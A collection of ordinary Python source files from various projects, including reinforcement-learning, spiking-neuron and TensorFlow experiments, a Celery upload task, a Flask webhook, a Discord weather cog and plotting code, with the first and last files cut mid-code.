'policy':\n func = mpc.get_action_policy\n elif function_name == 'policy-kl':\n func = mpc.get_action_policy_kl\n elif function_name == 'policy-kl2':\n func = mpc.get_action_policy_kl_2\n elif function_name == 'policy_double':\n func = mpc.get_action_policy\n elif function_name == 'cem':\n func = mpc.get_action_cem\n elif function_name == 'policy-entropy':\n func = mpc.get_action_policy_entropy\n elif function_name == 'policy-kl4':\n func = mpc.get_action_policy_kl_4\n elif function_name == 'policy-gamma':\n func = mpc.get_action_policy_gamma\n elif function_name == 'policy-mean':\n func = mpc.get_action_policy_mean\n elif function_name == 'policy-kl5':\n func = mpc.get_action_policy_kl_5\n elif function_name == 'proposed_cem':\n func = mpc.get_action_cem_proposed\n\n else:\n print('error')\n exit()\n logging.info('mpc_function %s', function_name)\n comment = args[8]\n if comment is not None:\n logging.info(comment)\n for nsteps in range(n_steps):\n best_score = env.reward_range[0]\n score_history = []\n load_checkpoint = True\n steps = 0\n observation = env.reset()\n done = False\n score = 0\n ep_length = 0\n\n if not use_mpc:\n while not done:\n action = agent.choose_action(observation)\n observation_, reward, done, info = env.step(action)\n #print(env.sim.data.qpos, env.sim.data.qvel)\n steps += 1\n agent.remember(observation, action,\n reward, observation_, done)\n buffer.add(state=observation, action=action,\n next_state=observation_, reward=reward)\n agent.learn()\n score += reward\n if steps % 100 == 0:\n print(steps)\n observation = observation_\n # env.render()\n ep_length += 1\n # time.sleep(0.1)\n else:\n model, rewardmodel = fit_model(buffer, grad_steps)\n if function_name == 'policy_double':\n if nsteps >= 0.1 * n_steps:\n func = mpc.get_action_policy_kl_2\n while not done:\n # return best_action ,,actions, states, sum_rewards\n #action, actions, states, sum_rewards = func(observation)\n action = func(observation)\n observation_, reward, done, info = env.step(action)\n agent.remember(observation, action,\n reward, observation_, done)\n buffer.add(state=observation, action=action,\n next_state=observation_, reward=reward)\n agent.learn()\n env.render()\n # print(rewardmodel.forward_all(torch.from_numpy(\n # observation).float(), torch.from_numpy(action).float()))\n if steps % 100 == 0:\n # square_mean_error(env, env_evaluate, actions,\n # states, sum_rewards, horizon, steps)\n\n print(steps)\n\n steps += 1\n score += reward\n observation = observation_\n\n score_history.append(score)\n avg_score = np.mean(score_history[-100:])\n rewards.append(avg_score)\n if avg_score > best_score:\n best_score = avg_score\n '''if not load_checkpoint:\n self.save_models()'''\n\n print('episode ', nsteps, 'score %.1f' % score,\n 'trailing 100 games avg %.1f' % avg_score,\n 'steps %d' % steps,\n 'ep_length %d' % ep_length\n )\n logging.info('episode: %d score: %.1f 100 games avg: %.1f steps %d ',\n nsteps, score, avg_score, steps,)\n","sub_path":"main_sac.py","file_name":"main_sac.py","file_ext":"py","file_size_in_byte":10423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"71589192","text":"'''创建logger类'''\nimport os\nimport sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_DIR)\n\nimport logging\nfrom conf import settings\n\nclass Logger(object):\n\n def __init__(self, loggerName=None, logger_dbj=None):\n self.name = loggerName\n self.logger = logger_dbj\n\n def create_logger(self, level=logging.DEBUG):\n '''创建logger对象'''\n self.logger = logging.getLogger(self.name)\n self.logger.setLevel(level)\n\n def set_formatter(self, formatterStr):\n '''设置日志格式'''\n formatter = logging.Formatter(formatterStr)\n return formatter\n\n\n def create_console_handler(self, level=logging.DEBUG, formatterStr=None):\n '''创建控制台handler'''\n #创建控制台handler对象\n ch = logging.StreamHandler()\n ch.setLevel(level)\n\n #设置日志格式\n formatter = self.set_formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n\n #将设置好的handler加入logger\n self.logger.addHandler(ch)\n\n def create_file_handler(self, level=logging.DEBUG, formatterStr=None):\n '''创建文件handler'''\n #创建文件handler对象\n fh = logging.FileHandler(settings.LOG_TYPES['operator'])\n fh.setLevel(settings.LOG_LEVEL)\n\n # 设置日志格式\n formatter = self.set_formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n\n # 将设置好的handler加入logger\n self.logger.addHandler(fh)","sub_path":"day12-mysql及sqlalchemy/core/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"556669412","text":"from django.conf import settings\nfrom celery.task import task\nimport cStringIO as StringIO\nimport re\nimport csv\nimport os\nimport urlparse\nimport urllib2\nimport httplib\nimport httplib2\nimport tempfile\nimport simplejson\nimport math\n\nfrom django.contrib.auth.models import User\n\nfrom oauth2client.django_orm import Storage\nimport gdata.docs\nimport gdata.docs.client\nimport gdata.docs.data\nfrom captricity_cloud_io.models import CredentialsModel, FlowModel, UserProfile\n\ndef upload_to_captricity_by_url(source_urls, job_id, user_profile_id):\n _upload_to_captricity_by_url.delay(source_urls, job_id, user_profile_id)\n\n@task(ignore_result=True)\ndef _upload_to_captricity_by_url(source_urls, job_id, user_profile_id):\n \"\"\"Pull resource from url and upload to captricity\"\"\"\n client = UserProfile.objects.get(id=user_profile_id).get_captricity_client()\n # First find out how many pages there are in the document, so that we know how to group the list of images into image sets\n page_count = client.read_job(job_id)['document']['sheet_count']\n # Assume the images are in order, neatly sorted into image sets\n for i in range(int(math.ceil(len(source_urls) / float(page_count)))):\n # For each group of images in a image set, create the instance set on the captricity server\n iset = client.create_instance_sets(job_id, {'name':'iset '+str(i)})\n # Then upload in order, assuming they are in page number order\n for page_number,file_data in enumerate(source_urls[(i*page_count):(i*page_count)+page_count]):\n # Since we can't upload a url, and since the captricity python client is not compatible with \"file-like\" objects, so first retrieve the file from the url on to disk, then pass the local file to captricity python client to upload\n os_handle, path = tempfile.mkstemp()\n os.close(os_handle)\n f = open(path, \"w+\")\n f.write(urllib2.urlopen(file_data['url']).read())\n f.close()\n client.create_instance_set_instances(iset['id'], {'page_number': page_number, 'image_file':open(path)})\n os.remove(path)\n\ndef upload_to_google(job_id, user_id):\n _upload_to_google.delay(job_id, user_id)\n\n@task(ignore_result=True)\ndef _upload_to_google(job_id, user_id):\n \"\"\"Pull csv output from Captricity and pass onto google spreadsheets\"\"\"\n user = User.objects.get(id=user_id)\n\n # Get csv\n # We must first get the job, then get all datasets associated with the job. This is so that we get the metadata for datasets so we know which one to pull from captricity. We always pick the first one in the list. Once selected and we know the dataset id, retrieve the csv file\n client = user.get_profile().get_captricity_client()\n csv_data = client.read_job_results_csv(job_id)\n\n gclient = gdata.docs.client.DocsClient()\n gclient = _authorize_client(user, gclient)\n\n # write csv to file and upload to google spreadsheets\n os_handle, path = tempfile.mkstemp(suffix=\".csv\")\n os.close(os_handle)\n f = open(path, \"w+\")\n csv_fake_file = StringIO.StringIO(csv_data)\n csv_reader = csv.reader(csv_fake_file)\n field_names = csv_reader.next()\n csv_dict_reader = csv.DictReader(csv_fake_file, fieldnames=field_names)\n csv_dict_writer = csv.DictWriter(f, fieldnames=field_names)\n headers = dict( (n,n) for n in field_names )\n csv_dict_writer.writerow(headers)\n for row in csv_dict_reader:\n csv_dict_writer.writerow(row)\n f.close()\n\n csv_gfile = gdata.docs.data.Resource(type='spreadsheet', title='Sample Captricity CSV Results')\n media = gdata.data.MediaSource()\n media.SetFileHandle(path, 'text/csv')\n gfile = gclient.CreateResource(csv_gfile, media=media)\n\ndef _authorize_client(user, gclient):\n storage = Storage(CredentialsModel, 'id', user, 'credential')\n credential = storage.get()\n if credential is None or credential.invalid == True:\n raise Exception(\"Invalid credentials\")\n gclient = credential.authorize_gclient(gclient)\n return gclient\n\n","sub_path":"captricity_cloud_io/captricity_cloud_io/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"28160229","text":"#!/usr/bin/env python3\nfrom collections import defaultdict\nfrom functools import partial, reduce\nimport math\nfrom operator import mul\nimport os\nimport re\nfrom time import time\nfrom typing import Dict, List, Set, Tuple, Union\n\nfrom humanize import intcomma\n\n# Fix path so we can do a relative import: https://stackoverflow.com/a/27876800\nif __name__ == '__main__':\n if __package__ is None:\n import sys\n from os import path\n sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n\n # Relative imports here\n from util import *\n\nINPUT_FILE='18-input.txt'\n#INPUT_FILE='18a-example.txt'\n#INPUT_FILE='18b-example.txt'\n#INPUT_FILE='18c-example.txt'\n#INPUT_FILE='18d-example.txt'\n\nnum_match = re.compile(r'[\\d]+')\ninput = [[bla for bla in line.split(' ') if bla] for line in get_file_contents(INPUT_FILE)[0]]\n\nexpr_result = []\n\ndef eval_expr(b):\n op = None\n result = 0\n stack = []\n take = True\n for i, a in enumerate(b):\n if op == '+':\n result += a\n op = None\n continue\n elif op == '*':\n result *= a\n op = None\n continue\n elif take:\n result = a\n take = False\n\n if a == '+':\n op = a\n elif a == '*':\n stack.append(result)\n take = True\n\n if stack:\n stack.append(result)\n result = reduce(mul, stack)\n return result\n\nfor expr in input:\n stack = [[]]\n for el in expr:\n parens_begin = 0\n afaf = ''\n for i, char in enumerate(el):\n if char == '(':\n parens_begin += 1\n stack.append([])\n elif char == ')':\n if (num_match.match(afaf)):\n stack[-1].append(int(afaf))\n afaf = ''\n stack[-2].append(eval_expr(stack.pop()))\n else:\n afaf += char\n if (num_match.match(afaf)):\n stack[-1].append(int(afaf))\n else:\n stack[-1].append(afaf)\n\n expr_result.append(eval_expr(stack.pop()))\n\nprint(sum(expr_result))\n","sub_path":"18/18b.py","file_name":"18b.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"603167990","text":"#!/usr/bin/env python3\nfrom flask import Flask, jsonify\n\napp = Flask(__name__)\n\n\n@app.route(\"/webhooks/answer\")\ndef answer_call():\n ncco = [\n {\n \"action\": \"talk\",\n \"text\": \"Please wait while we connect you to the conference\"\n },\n {\n \"action\": \"conversation\",\n \"name\": CONF_NAME\n }]\n return jsonify(ncco)\n\n\nif __name__ == '__main__':\n app.run(port=3000)\n","sub_path":"voice/connect-callers-to-a-conference.py","file_name":"connect-callers-to-a-conference.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"476576309","text":"'''\n\n\nUsing LIF Neuron with Poisson input to classify\nsimple matrix of digits given in binary\n\nReference:\n=========\nhttps://github.com/PanYicheng/brian2-bpstdp/blob/master/poisson-test.py\n\n\n'''\n\nimport brian2 as b2\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\n\n# Global Parameters\nms = b2.ms\nmV = b2.mV\nHz = b2.Hz\n\n\ndef elapsed(sec):\n\n '''\n\n This function returns the elapsed time\n\n '''\n\n if sec < 60:\n return str(round(sec)) + ' secs'\n\n elif sec < 3600:\n return str((sec)) + ' mins'\n\n else:\n return str(round(sec / 3600)) + ' hrs'\n\n\n\n\ndef drawBinImage(img):\n\n '''\n\n This function prints the given\n image matrix for better display of\n the data\n\n '''\n for row in img.tolist():\n\n #print(row)\n for r in row:\n if r == 1:\n print('*' , end = ' ')\n else:\n print(' ' , end = '')\n\n print()\n\n\n print()\n\n\n\nif __name__ == '__main__':\n\n start_time = time.time()\n\n\n zero = np.matrix([\n 0, 1, 1, 1, 0,\n 1, 0, 0, 0, 1,\n 1, 0, 0, 0, 1,\n 1, 0, 0, 0, 1,\n 1, 0, 0, 0, 1,\n 0, 1, 1, 1, 0\n ])\n\n one = np.matrix([\n 1, 1, 1, 0, 0,\n 0, 0, 1, 0, 0,\n 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0,\n 0, 0, 1, 0, 0,\n 0, 0, 1, 1, 0\n ]) \n\n\n two = np.matrix([\n 0, 1, 1, 0, 0,\n 1, 0, 0, 1, 0,\n 0, 0, 0, 1, 0,\n 0, 1, 1, 0, 0,\n 1, 0, 0, 0, 0,\n 1, 1, 0, 1, 1,\n ]) \n \n\n\n data = [zero , one , two]\n data = [d.reshape((6 , 5)) for d in data]\n\n [drawBinImage(d) for d in data]\n\n spike_time_arr = []\n spike_fire_idx = []\n spike_volt = []\n state_time_arr = []\n\n\n \n\n num_samples , neurons = data[0].T.shape\n\n tau = neurons * ms\n\n print('Num samples: ' , num_samples , ' neurons: ' , neurons)\n\n for x in range(len(data)):\n\n\n poi_rates = np.arange(neurons) * Hz\n\n ta = b2.TimedArray(data[x].T , dt = 1 * ms)\n \n\n Poi_Inp = b2.PoissonGroup(30 ,\n rates = 'ta(t , i) * Hz' ,\n name = 'Poisson_Input')\n\n eqs_lif = '''\n\n dv/dt = (I - v)/tau : 1 (unless refractory)\n I = ta(t , i) : 1\n\n '''\n\n hidden = b2.NeuronGroup(neurons ,\n eqs_lif ,\n threshold = 'v > 0',\n reset = 'v = 0',\n refractory = 1 * ms , \n method = 'exact' ,\n name = 'hidden_layer')\n\n\n output = b2.NeuronGroup(len(data) ,\n eqs_lif ,\n threshold = 'v > 0',\n reset = 'v = 0' ,\n method = 'euler' ,\n refractory = 1 * ms , \n name = 'output_layer'\n )\n\n\n Syn_inp_hid = b2.Synapses(Poi_Inp , hidden ,\n model = 'w : 1' ,\n on_pre = 'v_post += w' ,\n name = 'Synapse_Input_hidden')\n\n \n\n Syn_inp_hid.connect()\n\n Syn_inp_hid.w = np.random.randn(30 * neurons) * 22\n \n\n Syn_hid_out = b2.Synapses(hidden , output ,\n model = 'w : 1' ,\n on_pre = 'v_post += w' ,\n name = 'Synapse_hidden_output')\n\n\n Syn_hid_out.connect()\n\n Syn_hid_out.w = np.random.randn(neurons * len(data))\n\n state_mon = b2.StateMonitor(output ,\n variables = True ,\n record = True ,\n name = 'State_mon')\n\n spike_mon = b2.SpikeMonitor(hidden , name = 'Spike_mon_hidden')\n pop_rate_mon = b2.PopulationRateMonitor(output)\n\n b2.run(num_samples * ms , report = 'text')\n\n\n print('No of Spikes : {}'.format(spike_mon.num_spikes))\n print('Spike array: {}'.format(spike_mon.count))\n print()\n\n print('Spike times: ' , spike_mon.t[ : ])\n print()\n\n plt.plot(spike_mon.t/ms , spike_mon.i , '.k' , ms = 3)\n plt.xlabel('Time(ms)')\n plt.ylabel('Neuron Index')\n plt.show()\n \n\n elapsed_time = elapsed(time.time() - start_time)\n print('Elapsed time: ' , elapsed_time)\n \n \n","sub_path":"lif_poisson_classify.py","file_name":"lif_poisson_classify.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"111810261","text":"# The aim is to use DNN or RNN to learn denoising\n# The difficulty might come across will be the input data into train file or test file\n\n#import IPython.display\n#from ipywidgets import interact, interactive, fixed\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import FuncFormatter\nimport copy\nfrom scipy.fftpack import fft\nfrom scipy import ifft\nfrom scipy.signal import butter, lfilter\nimport scipy.ndimage\n#import soundfile as sf\nfrom scipy import ceil, complex64, float64, hamming, zeros\nimport tensorflow as tf\n\n\n### Function part ###\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\ndef compute_accuracy(v_xs, v_ys):\n global prediction\n y_pre = sess.run(prediction, feed_dict={xs: v_xs, keep_prob: 1})\n correct_prediction = tf.equal(tf.argmax(y_pre, 1), tf.argmax(v_ys, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n result = sess.run(accuracy, feed_dict={xs: v_xs, ys: v_ys, keep_prob: 1})\n return result\n\n\ndef compute_loss(v_xs, v_ys):\n y_pre = sess.run(prediction, feed_dict={xs: v_xs, keep_prob: 1})\n dif = y_pre - v_ys\n dif = tf.constant(dif, tf.int32)\n dif = tf.abs(dif)\n loss = tf.reduce_mean(tf.reduce_sum(dif, reduction_indices=[0, 1]))\n result = sess.run(loss, feed_dict={xs: v_xs, ys: v_ys, keep_prob: 1})\n return result\n\ndef loss(v_xs, v_ys):\n y_pre = sess.run(prediction, feed_dict={xs: v_xs, keep_prob: 1})\n dif = y_pre - v_ys\n cross_entropy = tf.reduce_mean(tf.reduce_sum((dif)))\n loss = cross_entropy.eval(session = sess)\n # y_pre = sess.run(prediction, feed_dict={xs: v_xs, keep_prob: 1})\n # dif = y_pre - v_ys\n # dif = tf.constant(dif, tf.int32)\n # dif = tf.abs(dif)\n # loss = tf.reduce_mean(tf.reduce_sum(dif, reduction_indices=[0, 1]))\n # result = sess.run(loss, feed_dict={xs: v_xs, ys: v_ys, keep_prob: 1})\n loss = np.abs(loss)\n return loss\n\n\n### Structure part ###\n\n# define placeholder for inputs to network\n\nxs = tf.placeholder(tf.float32, [None, 2470])# , name=\"x_input\") # 247*10\nys = tf.placeholder(tf.float32, [None, 2470])# , name=\"y_input\")\n\nprediction = tf.placeholder(tf.float32, [None, 2470])\nkeep_prob = tf.placeholder(tf.float32)\n\n## fc1 layer ##\nwith tf.name_scope('fully_connected_layer1'):\n W_fc1 = weight_variable([2470, 2470])\n b_fc1 = bias_variable([2470])\n h_fc1 = tf.nn.relu(tf.matmul(xs, W_fc1) + b_fc1)\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n## fc2 layer ##\nW_fc2 = weight_variable([2470, 2470])\nb_fc2 = bias_variable([2470])\nh_fc2 = tf.nn.relu(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\nh_fc2_drop = tf.nn.dropout(h_fc2, keep_prob)\n\n## fc2 layer ##\nW_fc3 = weight_variable([2470, 2470])\nb_fc3 = bias_variable([2470])\nprediction = tf.nn.sigmoid(tf.matmul(h_fc2_drop, W_fc3) + b_fc3)\n\n# the loss\nwith tf.name_scope('cross_entropy'):\n dif = prediction - ys\n cross_entropy = tf.reduce_mean(tf.reduce_sum((dif)))\n #cross_entropy = tf.reduce_mean(tf.losses.mean_squared_error(ys, prediction))\n tf.summary.histogram('cross_entropy', cross_entropy)\n tf.summary.scalar('cross_entropy', cross_entropy)\n\n# -tf.reduce_sum(ys * tf.log(prediction),\n# reduction_indices=[1]))\nwith tf.name_scope('train'):\n train_step = tf.train.AdamOptimizer(1e-5).minimize(cross_entropy)\n\nsess = tf.Session()\n\nmerged = tf.summary.merge_all()\nwriter = tf.summary.FileWriter(\"logsss5000000/\", sess.graph)\n\nsess.run(tf.global_variables_initializer())\n\nclean_mask = np.loadtxt(\"clean_mask.txt\")\nspec_train = np.loadtxt(\"spec_train.txt\")\nclean_mask_test = np.loadtxt(\"clean_mask_test.txt\")\nspec_train_test = np.loadtxt(\"spec_train_test.txt\")\n\nfor i in range(50000):\n batch_xs = spec_train\n batch_ys = clean_mask\n\n sess.run(train_step, feed_dict={xs: batch_xs, ys: batch_ys, keep_prob: 0.5})\n # if i % 5 == 0:\n # a = tf.Print(prediction, [prediction])\n # print (sess.run(prediction))\n # result = a + 0\n if i % 10 == 0:\n # print(compute_accuracy(spec_train_test, clean_mask_test))\n #result = sess.run(merged, feed_dict={xs: batch_xs, ys: batch_ys})\n #writer.add_summary(result, i)\n # print(compute_accuracy(spec_train_test, clean_mask_test))\n # print(compute_loss(spec_train_test, clean_mask_test))\n\n print(compute_accuracy(spec_train, clean_mask))\n print(loss(spec_train, clean_mask))\n \n\n# pre = sess.run(prediction,feed_dict={xs: batch_xs, ys: batch_ys})\n\n# ### Check part\n# a = stft(data, win, step)\n# b = a.shape\n\n\n# sess.run(prediction)\n","sub_path":"Preprocessing part/11.24. Denoising 5th versionize.py","file_name":"11.24. Denoising 5th versionize.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"580334198","text":"import argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import Subset\nimport numpy as np\nimport tqdm\nimport matplotlib.pyplot as plt\nfrom matplotlib.offsetbox import OffsetImage, AnnotationBbox\nfrom networks import Encoder\nfrom train import get_loader\n\ndef test_conv(model, subsample=False):\n \"\"\"Measures testing accuracy of the baseline\n \"\"\"\n # load in data\n testloader = get_loader(10, train=False, subsample=subsample)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # evaluation\n correct = 0\n total = 0\n with torch.no_grad():\n for data in testloader:\n images, labels = data\n images, labels = images.to(device), labels.to(device)\n outputs = model(images)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n return correct/total\n\ndef plot_tsne(targets, ret):\n\n # Load data\n transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n dataset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform)\n\n # target indices\n target_ids = range(len(set(targets)))\n\n colors = ['r', 'g', 'b', 'c', 'm', 'y', 'k', 'violet', 'orange', 'purple']\n\n plt.figure(figsize=(12, 10))\n\n ax = plt.subplot(aspect='equal')\n for label in set(targets):\n idx = np.where(np.array(targets) == label)[0]\n plt.scatter(ret[idx, 0], ret[idx, 1], c=colors[label], label=label)\n\n for i in range(0, len(targets), 250):\n img = (dataset[i][0] * 0.3081 + 0.1307).numpy()[0]\n img = OffsetImage(img, cmap = 'gray',zoom=1)\n ax.add_artist(AnnotationBbox(img, ret[i]))\n\n plt.savefig('./results/tsne.png')\n plt.legend()\n plt.show()\n\ndef encode_data(train = False, subsample = False):\n \"\"\"Encodes the dataset with the pretrained unsupervsied encoders\n using either the training or testing data.\n \"\"\"\n # load model\n model = Encoder()\n model.load_state_dict(torch.load('./results/encoder.pth', map_location=torch.device('cuda')))\n\n # Load data\n transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n dataset = torchvision.datasets.CIFAR10(root='./data', train=train, download=True, transform=transform)\n\n if subsample: # randomly samples 1/10 of the train/test data for multiple runs\n bound = 50000 if train else 10000\n size = 5000 if train else 1000\n dataset = Subset(dataset, np.random.randint(0, bound, size))\n\n # encode data using encoder\n data = []\n targets = []\n for m in tqdm.tqdm(dataset):\n target = m[1]\n targets.append(target)\n x = m[0]\n x = x.view(1, *x.shape)\n feat = model(x)\n data.append(feat.data.numpy()[0])\n\n return np.array(data), np.array(targets)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"494177046","text":"import pygame\n\n\nclass Button:\n def __init__(self, width, height, center, text, background, font, id):\n self.surface = pygame.Surface((width, height))\n self.rect = self.surface.get_rect()\n self.surface.fill(background)\n self.rect.center = center\n self.textSurf = font.render(text, 1, [0, 0, 0])\n self.textRect = self.textSurf.get_rect(center=(width / 2, height / 2))\n self.surface.blit(self.textSurf, self.textRect)\n self.rect = pygame.Rect(center, (width, height))\n self.id = id\n self.font = font\n self.text = text\n self.width = width\n self.height = height\n self.center = center\n\n def draw(self, screen):\n screen.blit(self.surface, self.rect)\n pygame.draw.rect(screen, [0, 0, 0], self.rect, 1)\n\n def change_background(self, background):\n self.surface = pygame.Surface((self.width, self.height))\n self.rect = self.surface.get_rect()\n self.surface.fill(background)\n self.rect.center = self.center\n self.textSurf = self.font.render(self.text, 1, [0, 0, 0])\n self.textRect = self.textSurf.get_rect(center=(self.width / 2, self.height / 2))\n self.surface.blit(self.textSurf, self.textRect)\n self.rect = pygame.Rect(self.center, (self.width, self.height))\n","sub_path":"Button.py","file_name":"Button.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"428182922","text":"from discord.ext import commands\r\nfrom cogs.utils.dataIO import dataIO\r\nimport aiohttp\r\nimport os\r\nfrom .utils import checks\r\nimport discord\r\n\r\n\r\nclass Weather:\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.settings_file = 'data/weather/weather.json'\r\n\r\n @commands.command(pass_context=True, name='weather', aliases=['we'])\r\n async def _weather(self, context, *location: str):\r\n \"\"\"Get the weather!\"\"\"\r\n settings = dataIO.load_json(self.settings_file)\r\n api_key = settings['WEATHER_API_KEY']\r\n if len(location) == 0:\r\n message = 'No location provided.'\r\n elif api_key != '':\r\n try:\r\n payload = {'q': \" \".join(location), 'appid': api_key}\r\n url = 'http://api.openweathermap.org/data/2.5/weather?'\r\n headers = {'user-agent': 'Red-cog/1.0'}\r\n conn = aiohttp.TCPConnector()\r\n session = aiohttp.ClientSession(connector=conn)\r\n async with session.get(url, params=payload, headers=headers) as r:\r\n parse = await r.json()\r\n session.close()\r\n celcius = parse['main']['temp']-273\r\n fahrenheit = parse['main']['temp']*9/5-459\r\n temperature = '{0:.1f} Celsius\\n{1:.1f} Fahrenheit'.format(celcius, fahrenheit)\r\n humidity = str(parse['main']['humidity']) + '%'\r\n pressure = str(parse['main']['pressure']) + ' hPa'\r\n wind_kmh = str(round(parse['wind']['speed'] * 3.6)) + ' km/h'\r\n wind_mph = str(round(parse['wind']['speed'] * 2.23694)) + ' mph'\r\n clouds = parse['weather'][0]['description'].title()\r\n icon = parse['weather'][0]['icon']\r\n name = parse['name'] + ', ' + parse['sys']['country']\r\n city_id = parse['id']\r\n em = discord.Embed(title='Weather in {}'.format(name), color=discord.Color.blue(), description='\\a\\n', url='https://openweathermap.org/city/{}'.format(city_id))\r\n em.add_field(name='**Conditions**', value=clouds)\r\n em.add_field(name='**Temperature**', value=temperature)\r\n em.add_field(name='\\a', value='\\a')\r\n em.add_field(name='**Wind**', value='{}\\n{}'.format(wind_kmh, wind_mph))\r\n em.add_field(name='**Pressure**', value=pressure)\r\n em.add_field(name='**Humidity**', value=humidity)\r\n em.set_thumbnail(url='https://openweathermap.org/img/w/{}.png'.format(icon))\r\n em.set_footer(text='Weather data provided by OpenWeatherMap', icon_url='http://openweathermap.org/themes/openweathermap/assets/vendor/owm/img/icons/logo_16x16.png')\r\n await self.bot.say(embed=em)\r\n except KeyError:\r\n message = 'Location not found.'\r\n await self.bot.say('```{}```'.format(message))\r\n else:\r\n message = 'No API key set. Get one at http://openweathermap.org/'\r\n await self.bot.say('```{}```'.format(message))\r\n\r\n\r\ndef check_folder():\r\n if not os.path.exists(\"data/weather\"):\r\n print(\"Creating data/weather folder...\")\r\n os.makedirs(\"data/weather\")\r\n\r\n\r\ndef check_file():\r\n weather = {}\r\n weather['WEATHER_API_KEY'] = ''\r\n weather['TIME_API_KEY'] = ''\r\n\r\n f = \"data/weather/weather.json\"\r\n if not dataIO.is_valid_json(f):\r\n print(\"Creating default weather.json...\")\r\n dataIO.save_json(f, weather)\r\n\r\n\r\ndef setup(bot):\r\n check_folder()\r\n check_file()\r\n bot.add_cog(Weather(bot))","sub_path":"weather/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"460050607","text":"'''\nCreated on Mar 21, 2012\n\n@author: mkraus\n'''\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm, colors, gridspec\nfrom matplotlib.ticker import MultipleLocator, FormatStrFormatter, ScalarFormatter\n\n\nclass PlotReplay(object):\n '''\n classdocs\n '''\n\n def __init__(self, grid, distribution, hamiltonian, potential,nTime=0, iStart=0, nPlot=1, vMax=0.0):\n '''\n Constructor\n '''\n \n # number of contour levels\n self.nconts = 20\n \n # colour map\n self.cmap = cm.jet\n# self.cmap = cm.hsv\n# self.cmap = cm.brg\n# self.cmap = cm.RdYlGn\n \n if nTime > 0 and nTime < grid.nt:\n self.nTime = nTime\n else:\n self.nTime = grid.nt\n \n self.nTime -= iStart\n self.iTime = iStart\n self.iStart = iStart\n self.nPlot = nPlot\n self.vMax = vMax\n \n self.grid = grid\n self.distribution = distribution\n self.hamiltonian = hamiltonian\n self.potential = potential\n \n self.partnum = np.zeros(grid.nt+1)\n self.momentum = np.zeros(grid.nt+1)\n self.energy = np.zeros(grid.nt+1)\n self.enstrophy = np.zeros(grid.nt+1)\n self.entropy = np.zeros(grid.nt+1)\n self.energy_f = np.zeros(grid.nt+1)\n self.energy_p = np.zeros(grid.nt+1)\n self.ekin = np.zeros(grid.nt+1)\n self.epot = np.zeros(grid.nt+1)\n \n self.x = np.zeros(grid.nx+1)\n self.n = np.zeros(grid.nx+1)\n self.phi = np.zeros(grid.nx+1)\n \n self.x[0:-1] = self.grid.x\n self.x[ -1] = self.grid.xLength()\n \n \n # set up figure/window size\n self.figure = plt.figure(num=None, figsize=(16,9))\n \n # set up plot margins\n plt.subplots_adjust(hspace=0.2, wspace=0.25)\n plt.subplots_adjust(left=0.03, right=0.97, top=0.93, bottom=0.05)\n \n # set up plot title\n self.title = self.figure.text(0.5, 0.97, 't = 0.0' % (self.grid.t[self.iTime]), horizontalalignment='center') \n \n # set up tick formatter\n majorFormatter = ScalarFormatter(useOffset=False)\n ## -> limit to 1.1f precision\n majorFormatter.set_powerlimits((-1,+1))\n majorFormatter.set_scientific(True)\n\n # add data for zero timepoint\n self.add_timepoint()\n \n # set up plots\n self.axes = {}\n self.conts = {}\n self.cbars = {}\n self.lines = {}\n \n self.update_boundaries()\n \n \n # create subplots\n gs = gridspec.GridSpec(4, 4)\n \n self.axes[\"f\"] = plt.subplot(gs[0:2,0:2])\n self.axes[\"n\"] = plt.subplot(gs[0:2,2])\n self.axes[\"h\"] = 